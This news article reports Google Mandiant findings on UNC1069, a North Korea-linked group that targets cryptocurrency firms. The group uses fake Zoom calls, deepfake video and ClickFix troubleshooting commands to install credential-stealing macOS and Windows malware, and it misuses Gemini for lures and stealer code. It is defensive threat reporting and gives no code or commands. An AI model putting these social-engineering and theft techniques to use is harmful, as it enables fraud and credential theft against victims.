The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft.
“The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim,” Google Mandiant researchers Ross Inman and Adrian Hernandez said.
UNC1069, assessed to be active since at least April 2018, has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. It’s also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN.
In a report published last November, Google Threat Intelligence Group (GTIG) pointed out the threat actor’s use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of efforts to support its social engineering campaigns.
The group has also been observed attempting to misuse Gemmini to develop code to steal cryptocurrency, as well as leverage deepfake images and video lures mimicking individuals in the cryptocurrency industry in its campaigns to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).
“Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds,” Google said.
In the latest intrusion documented by the tech giant’s threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH.
It all starts when a victim is approached by the threat actor via Telegram by impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with them.
The meeting link is designed to redirect the victim to a fake website masquerading as Zoom (“zoom.uswe05[.]us”). In certain cases, the meeting links are directly shared via messages on Telegram, often using Telegram’s hyperlink feature to hide the phishing URLs.
Regardless of the method used, as soon as the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom, urging them to enable their camera and enter their name. Once the target joins the meeting, they are displayed a screen that resembles an actual Zoom meeting.
However, it’s suspected that videos are either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme. It’s worth noting that Kaspersky is tracking the same campaign under the name GhostCall, which was documented in detail in October 2025.
“Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call,” the Russian security vendor noted at the time. “When the video replay ended, the page smoothly transitioned to showing that user’s profile image, maintaining the illusion of a live call.”
The attack proceeds to the next phase when the victim is shown a bogus error message about a purported audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system.
Called WAVESHAPER, the malicious C++ executable is designed to gather system information and distribute a Go-based downloader codenamed HYPERCALL, which is then used to serve additional payloads –
- A follow-on Golang backdoor component known as HIDDENCALL, which provides hands-on keyboard access to the compromised system and deploys a Swift-based data miner called DEEPBREATH.
- A second C++ downloader called SUGARLOADER, which is used to deploy CHROMEPUSH.
- A minimalist C/C++ backdoor referred to as SILENCELIFT, which sends system information to a command-and-control (C2) server.
DEEPBREATH is equipped to manipulate macOS’s Transparency, Consent, and Control (TCC) database to gain file system access, enabling it to steal iCloud Keychain credentials, and data from Google Chrome, Brave, and Microsoft Edge, Telegram, and the Apple Notes application.
Like DEEPBREATH, CHROMEPUSH also acts as a data stealer, only it’s written in C++ and is deployed as a browser extension to Google Chrome and Brave browsers by masquerading as a tool for editing Google Docs offline. It also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.
“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant said. “While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities.”
